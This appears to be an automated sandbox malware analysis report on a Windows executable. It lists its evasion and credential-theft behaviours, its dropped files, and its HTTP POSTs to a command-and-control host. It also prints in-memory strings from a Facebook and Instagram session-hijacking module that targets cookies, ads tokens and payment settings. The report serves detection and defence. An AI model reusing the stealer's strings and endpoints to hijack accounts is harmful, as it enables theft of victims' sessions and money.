Play interactive tour

Edit tour

Analysis Report h1GodtbhC8.exe

Overview

General Information

Sample Name:	h1GodtbhC8.exe
Analysis ID:	327203
MD5:	3ca6df4914385efd4ba9cd239b5ed254
SHA1:	b66535ff43334177a5a167b9f2b07ade75484eec
SHA256:	0acebaf80946be0cb3099233e8807aa775c8304fc3dee48d42241ff68b7ab318
Tags:	exe
Most interesting Screenshot:

Detection

Score:	87
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (creates a PE file in dynamic memory)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Binary contains a suspicious time stamp

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to detect sleep reduction / modifications

Contains functionality to infect the boot sector

Hides threads from debuggers

Installs new ROOT certificates

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file has a writeable .text section

Registers a new ROOT certificate

Tries to harvest and steal browser information (history, passwords, etc)

Antivirus or Machine Learning detection for unpacked file

Checks for available system drives (often done to infect USB drives)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read device registry values (via SetupAPI)

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

File is packed with WinRar

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

Launches processes in debugging mode, may be used to hinder debugging

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains strange resources

Queries device information via Setup API

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara signature match

Classification

Startup

System is w10x64

h1GodtbhC8.exe (PID: 6364 cmdline: 'C:\Users\user\Desktop\h1GodtbhC8.exe' MD5: 3CA6DF4914385EFD4BA9CD239B5ED254)

setup.exe (PID: 5840 cmdline: 'C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe' -s MD5: 69C9BA53239D6838D05594D96A36DEA3)

aliens.exe (PID: 1320 cmdline: 'C:\Program Files (x86)\71eza90awf48\aliens.exe' MD5: 87698F069716708B6743A580B1D0D0CC)

msiexec.exe (PID: 6976 cmdline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

1E1C360C582DF797.exe (PID: 4652 cmdline: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 0011 installp3 MD5: 87698F069716708B6743A580B1D0D0CC)

1607153318099.exe (PID: 6940 cmdline: 'C:\Users\user\AppData\Roaming\1607153318099.exe' /sjson 'C:\Users\user\AppData\Roaming\1607153318099.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)

1E1C360C582DF797.exe (PID: 7156 cmdline: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 200 installp3 MD5: 87698F069716708B6743A580B1D0D0CC)

msiexec.exe (PID: 7068 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 137E5E97B7A1A176AEBB5BF742E73DAB C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000F.00000002.1022272308.00000000059A9000.00000004.00000001.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x1576d6:$xo1: /\x13\x12\x08[\x0B\x09\x14\x1C\x09\x1A\x16[\x18\x1A\x15\x15\x14\x0F[\x19\x1E[\x09\x0E\x15[\x12\x15[?4([\x16\x14\x1F\x1E
00000006.00000002.1010080806.0000000004870000.00000040.00000001.sdmp	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
0000000F.00000002.1010698141.0000000004790000.00000040.00000001.sdmp	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.aliens.exe.4870000.5.raw.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
15.2.1E1C360C582DF797.exe.4790000.5.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
15.2.1E1C360C582DF797.exe.10000000.8.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
6.2.aliens.exe.4870000.5.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
6.2.aliens.exe.10000000.6.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
15.2.1E1C360C582DF797.exe.4790000.5.raw.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
15.2.1E1C360C582DF797.exe.5720000.7.unpack	APT34_PICKPOCKET	unknown	unknown	0x200c9c:$s2: \nss3.dll 0x249d10:$s2: \nss3.dll 0x3fc4f0:$s4: \| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger'); 0x1d0d44:$s5: \Login Data 0x1d0e34:$s5: \Login Data 0x1d0f24:$s5: \Login Data 0x1d1064:$s5: \Login Data 0x1d1274:$s5: \Login Data 0x1d12f4:$s5: \Login Data 0x1d1374:$s5: \Login Data 0x1d1438:$s5: \Login Data 0x1d1634:$s5: \Login Data 0x1d1744:$s5: \Login Data 0x1d18d4:$s5: \Login Data 0x1d1944:$s5: \Login Data 0x200d10:$s6: %s\Mozilla\Firefox\profiles.ini 0x249d90:$s6: %s\Mozilla\Firefox\profiles.ini 0x1d0d45:$s7: Login Data 0x1d0e35:$s7: Login Data 0x1d0f25:$s7: Login Data 0x1d1065:$s7: Login Data
15.2.1E1C360C582DF797.exe.5270000.6.unpack	APT34_PICKPOCKET	unknown	unknown	0x200c9c:$s2: \nss3.dll 0x249d10:$s2: \nss3.dll 0x3fc4f0:$s4: \| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger'); 0x1d0d44:$s5: \Login Data 0x1d0e34:$s5: \Login Data 0x1d0f24:$s5: \Login Data 0x1d1064:$s5: \Login Data 0x1d1274:$s5: \Login Data 0x1d12f4:$s5: \Login Data 0x1d1374:$s5: \Login Data 0x1d1438:$s5: \Login Data 0x1d1634:$s5: \Login Data 0x1d1744:$s5: \Login Data 0x1d18d4:$s5: \Login Data 0x1d1944:$s5: \Login Data 0x200d10:$s6: %s\Mozilla\Firefox\profiles.ini 0x249d90:$s6: %s\Mozilla\Firefox\profiles.ini 0x1d0d45:$s7: Login Data 0x1d0e35:$s7: Login Data 0x1d0f25:$s7: Login Data 0x1d1065:$s7: Login Data
Click to see the 3 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: h1GodtbhC8.exe

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: h1GodtbhC8.exe	Virustotal: Detection: 27%	Perma Link
Source: h1GodtbhC8.exe	Metadefender: Detection: 16%	Perma Link
Source: h1GodtbhC8.exe	ReversingLabs: Detection: 64%

Machine Learning detection for dropped file

Show sources

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: h1GodtbhC8.exe

Joe Sandbox ML: detected

Source: 15.2.1E1C360C582DF797.exe.4370000.4.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 6.2.aliens.exe.4450000.4.unpack	Avira: Label: TR/Patched.Ren.Gen2

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: z:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: x:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: v:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: t:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: r:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: p:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: n:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: l:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: j:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: h:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: f:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: b:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: y:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: w:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: u:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: s:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: q:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: o:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: m:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: k:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: i:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: g:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: e:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: c:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: a:

Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_00406301 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8D1C23 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8E0F62 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008AA534 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008BB820 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008CA928 FindFirstFileExA,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_00402D09 FindFirstFileA,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_0040693B DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_004066CC FindFirstFileA,FindClose,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_05867950 PathFileExistsA,_memset,_memset,_strcpy_s,_strcat_s,FindFirstFileA,_memset,_strcpy_s,_strcat_s,_strcat_s,_strcat_s,_strcat_s,PathFileExistsA,PathRemoveFileSpecA,_memset,_strlen,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_05865A90 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1001A170 FindFirstFileA,FindClose,

Source: global traffic	HTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: ef6df4af06ba6896.xyz
Source: global traffic	HTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: ef6df4af06ba6896.xyz
Source: global traffic	HTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: ef6df4af06ba6896.xyz
Source: global traffic	HTTP traffic detected: POST /info/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 677Host: ef6df4af06ba6896.xyz
Source: global traffic	HTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: ef6df4af06ba6896.xyz
Source: global traffic	HTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: ef6df4af06ba6896.xyz
Source: global traffic	HTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: ef6df4af06ba6896.xyz

Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@@@@https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: /Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: /Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesLocation: equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesocation: equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1x-auth-result: query_mess_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: x_auth_result = %s equals www.facebook.com (Facebook)
